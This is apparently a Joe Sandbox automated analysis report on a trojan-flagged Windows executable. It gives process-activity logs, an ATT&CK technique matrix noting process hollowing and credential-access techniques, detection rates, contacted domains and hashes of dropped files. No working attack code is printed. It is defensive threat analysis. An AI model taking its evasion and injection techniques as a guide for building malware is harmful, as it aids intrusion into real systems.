Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation		1
DLL Side-Loading		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Shared Modules		Boot or Logon Initialization Scripts111
Process Injection		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Clipboard Data		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)1
DLL Side-Loading		1
Access Token Manipulation		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync34
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1587855 Sample: Ej86aa7Ki7.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 68 24 Multi AV Scanner detection for submitted file 2->24 26 AI detected suspicious sample 2->26 7 Ej86aa7Ki7.exe 22 2->7         started        process3 file4 22 C:\Users\user\AppData\...\Taarnvognenes.Ufe, Unicode 7->22 dropped 28 Suspicious powershell command line found 7->28 11 powershell.exe 27 7->11         started        signatures5 process6 signatures7 30 Sample uses process hollowing technique 11->30 32 Found suspicious powershell code related to unpacking or dynamic code loading 11->32 34 Loading BitLocker PowerShell Module 11->34 14 SIHClient.exe 6 11->14         started        16 conhost.exe 11->16         started        18 msiexec.exe 11->18         started        20 35 other processes 11->20 process8

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Ej86aa7Ki7.exe63%VirustotalBrowse
Ej86aa7Ki7.exe61%ReversingLabsWin32.Trojan.Leonem

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.microsoft.a0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
84.201.210.38
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.microsoft.aSIHClient.exe, 00000004.00000003.2213230493.0000017F02A68000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212798692.0000017F02A6B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://nsis.sf.net/NSIS_ErrorErrorEj86aa7Ki7.exefalse
      		high

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1587855
      Start date and time:2025-01-10 18:39:22 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 7m 40s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:42
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Ej86aa7Ki7.exe
      renamed because original name is a hash value
      Original Sample Name:05199e2da28bae00c03632e937ba49adba3bd5c9ef102e14639de784a82eb765.exe
      Detection:MAL
      Classification:mal68.evad.winEXE@4487/19@0/0
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 48
      • Number of non-executed functions: 23
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Override analysis time to 240s for powershell

      Warnings

      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 84.201.210.38, 52.165.164.15, 13.95.31.18, 13.107.246.45
      • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtWriteVirtualMemory calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      12:40:14API Interceptor1488x Sleep call for process: powershell.exe modified
      12:40:29API Interceptor2x Sleep call for process: SIHClient.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com2153616741885716229.jsGet hashmaliciousStrela DownloaderBrowse
      • 217.20.57.26
      77502473271720630.jsGet hashmaliciousStrela DownloaderBrowse
      • 217.20.57.34
      2553416555111621752.jsGet hashmaliciousStrela DownloaderBrowse
      • 84.201.210.18
      1495528197325499932.jsGet hashmaliciousStrela DownloaderBrowse
      • 84.201.210.34
      31903173511658621632.jsGet hashmaliciousStrela DownloaderBrowse
      • 84.201.210.19
      334130052300215064.jsGet hashmaliciousStrela DownloaderBrowse
      • 217.20.57.19
      22977297631246330149.jsGet hashmaliciousStrela DownloaderBrowse
      • 217.20.57.36
      hy09j7Q8kJ.exeGet hashmaliciousFormBookBrowse
      • 217.20.57.35
      489131343024428850.jsGet hashmaliciousStrela DownloaderBrowse
      • 217.20.57.34
      32474162872806629906.jsGet hashmaliciousStrela DownloaderBrowse
      • 84.201.210.39

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

      Download File
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
      Category:dropped
      Size (bytes):4761
      Entropy (8bit):7.945585251880973
      Encrypted:false
      SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
      MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
      SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
      SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
      SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
      Malicious:false
      Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

      Download File
      Process:C:\Windows\System32\SIHClient.exe
      File Type:data
      Category:dropped
      Size (bytes):340
      Entropy (8bit):3.137857554099262
      Encrypted:false
      SSDEEP:6:kK82C5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:tILkPlE99SCQl2DUeXJlOA
      MD5:1E1749E25B31B0698DF2A3A7D7D6560C
      SHA1:C94F5CD7D89485D451285113C16FA07B6E2F15DB
      SHA-256:6CA82A5FDEF751143AA5AD0897053B5820DA088034878D03F81BDBB9E25CA119
      SHA-512:4D0711388E48343C27DE0D2DB647292FCDC139A1E11DD992B6659A15EC46A121CFDA1A4ACAAAE1EB93E8873A1158831A8B15B33D62C198FDE61CEC723ABDB8B4
      Malicious:false
      Preview:p...... ........^.p..c..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:modified
      Size (bytes):53158
      Entropy (8bit):5.062687652912555
      Encrypted:false
      SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
      MD5:5D430F1344CE89737902AEC47C61C930
      SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
      SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
      SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
      Malicious:false
      Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bmgr202.bhr.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
